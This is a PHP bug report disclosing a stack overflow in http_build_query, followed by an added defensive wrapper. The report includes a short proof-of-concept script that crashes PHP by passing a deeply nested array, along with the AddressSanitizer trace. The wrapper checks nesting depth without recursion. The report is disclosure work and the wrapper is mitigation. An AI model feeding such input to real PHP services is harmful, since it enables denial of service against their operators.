
Stack overflow in http_build_query via deep structures #20583

@012git012

Description

The following code:

<?php
// PoC: Stack overflow in http_build_query via unbounded recursion
// Builds a deeply nested array and calls http_build_query() to force deep C recursion
// Expected: AddressSanitizer/stack overflow crash or segfault
ini_set('memory_limit', '-1');
$depth = isset($argv[1]) ? (int)$argv[1] : 50000; // adjust as needed
fwrite(STDERR, "[i] Building nested array to depth {$depth}\n");
$a = null;
for ($i = 0; $i < $depth; $i++) {
    $a = [$i => $a];
}
fwrite(STDERR, "[i] Starting http_build_query()...\n");
// Use a small prefix to exercise integer-index path; not required for crash
$q = http_build_query($a, 'p');
// If it somehow returns, print small confirmation
echo "len=" . strlen($q) . "\n";

Resulted in this output:

$ ./php cli.php
[i] Building nested array to depth 50000
[i] Starting http_build_query()...
AddressSanitizer:DEADLYSIGNAL
=================================================================
==850581==ERROR: AddressSanitizer: stack-overflow on address 0x7fff75560f08 (pc 0x7986730a9080 bp 0x7fff755617a0 sp 0x7fff75560f10 T0)
    #0 0x7986730a9080 in prctl ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1249
    #1 0x6110da2db0fe in zend_mmap_set_name /home/administrator/php/php-src/Zend/zend_mmap.h:40
    #2 0x6110da2db6cc in zend_mm_mmap /home/administrator/php/php-src/Zend/zend_alloc.c:562
    #3 0x6110da2dc035 in zend_mm_chunk_alloc_int /home/administrator/php/php-src/Zend/zend_alloc.c:743
    #4 0x6110da2dc288 in zend_mm_chunk_alloc /home/administrator/php/php-src/Zend/zend_alloc.c:810
    #5 0x6110da2dce37 in zend_mm_alloc_pages /home/administrator/php/php-src/Zend/zend_alloc.c:1051
    #6 0x6110da2dd4a5 in zend_mm_alloc_large_ex /home/administrator/php/php-src/Zend/zend_alloc.c:1121
    #7 0x6110da2dd58b in zend_mm_alloc_large /home/administrator/php/php-src/Zend/zend_alloc.c:1138
    #8 0x6110da2df223 in zend_mm_alloc_heap /home/administrator/php/php-src/Zend/zend_alloc.c:1498
    #9 0x6110da2e6016 in _emalloc /home/administrator/php/php-src/Zend/zend_alloc.c:2783
    #10 0x6110da6d6f09 in zend_string_alloc /home/administrator/php/php-src/Zend/zend_string.h:167
    #11 0x6110da6d9222 in zend_string_concat3 /home/administrator/php/php-src/Zend/zend_string.c:493
    #12 0x6110d9f9dbc7 in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:180
    #13 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #14 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #15 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    …
    #245 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #246 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189

SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1249 in prctl
==850581==ABORTING

Build configuration:

$ ./configure CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address" --enable-debug

Researcher: Nikita Sveshnikov (Positive Technologies)

PHP Version

PHP 8.6.0-dev (cli) (built: Nov 18 2025 10:57:54) (NTS DEBUG)
Copyright (c) The PHP Group
Zend Engine v4.6.0-dev, Copyright (c) Zend Technologies
    with Zend OPcache v8.6.0-dev, Copyright (c), by Zend Technologies

Operating System

Ubuntu 24.04.2 LTS
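The trace above shows php_url_encode_hash_ex recursing once per nesting level with no depth limit, so the only thing standing between a deeply nested input and a crash is the C stack. Until the engine bounds that recursion, an application can refuse such structures before they reach http_build_query(). The following is an added example, not code from the bug report or from php-src: a non-recursive depth check (so the guard itself cannot overflow) wrapped around http_build_query(). The helper names, the default limit of 32 and the sample inputs are assumptions chosen for illustration.

```php
<?php
// Added example (not part of the bug report): a defensive, non-recursive
// nesting-depth check run before handing a structure to http_build_query().
declare(strict_types=1);

/**
 * Return the maximum nesting depth of $value (scalars = 0, flat array = 1).
 * Uses an explicit stack instead of recursion, so the check cannot overflow
 * the call stack, and stops early once $limit is exceeded.
 */
function array_nesting_depth(mixed $value, int $limit = PHP_INT_MAX): int
{
    if (!is_array($value) && !is_object($value)) {
        return 0;
    }
    $max = 0;
    // Work list of [container, depth-of-container] pairs.
    $stack = [[$value, 1]];
    while ($stack !== []) {
        [$node, $depth] = array_pop($stack);
        $max = max($max, $depth);
        if ($max > $limit) {
            return $max; // already over budget; no need to walk the rest
        }
        foreach ((array) $node as $child) {
            if (is_array($child) || is_object($child)) {
                $stack[] = [$child, $depth + 1];
            }
        }
    }
    return $max;
}

/**
 * Wrapper that rejects structures nested deeper than $maxDepth instead of
 * letting http_build_query() recurse once per level. (Hypothetical helper;
 * the limit is an assumption, pick one that fits the application's data.)
 */
function safe_http_build_query(array|object $data, int $maxDepth = 32, string $prefix = ''): string
{
    $depth = array_nesting_depth($data, $maxDepth);
    if ($depth > $maxDepth) {
        throw new InvalidArgumentException(
            "Refusing to encode structure nested deeper than {$maxDepth} levels"
        );
    }
    return http_build_query($data, $prefix);
}

// Constructed inputs for demonstration.
$shallow = ['user' => ['id' => 7, 'tags' => ['a', 'b']]];
echo safe_http_build_query($shallow), "\n";

// Same shape as the PoC, but far below the crash threshold and still rejected
// by the wrapper because it exceeds the configured limit.
$deep = null;
for ($i = 0; $i < 1000; $i++) {
    $deep = [$i => $deep];
}
try {
    safe_http_build_query($deep);
} catch (InvalidArgumentException $e) {
    echo "Rejected: ", $e->getMessage(), "\n";
}
```

The guard is deliberately iterative: a recursive depth counter written in PHP would protect http_build_query() only by moving the same unbounded recursion into userland. The same check applies to any other encoder that walks nested input recursively (serialization, JSON encoding with a small depth argument, template rendering), which is why it is kept separate from the wrapper.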
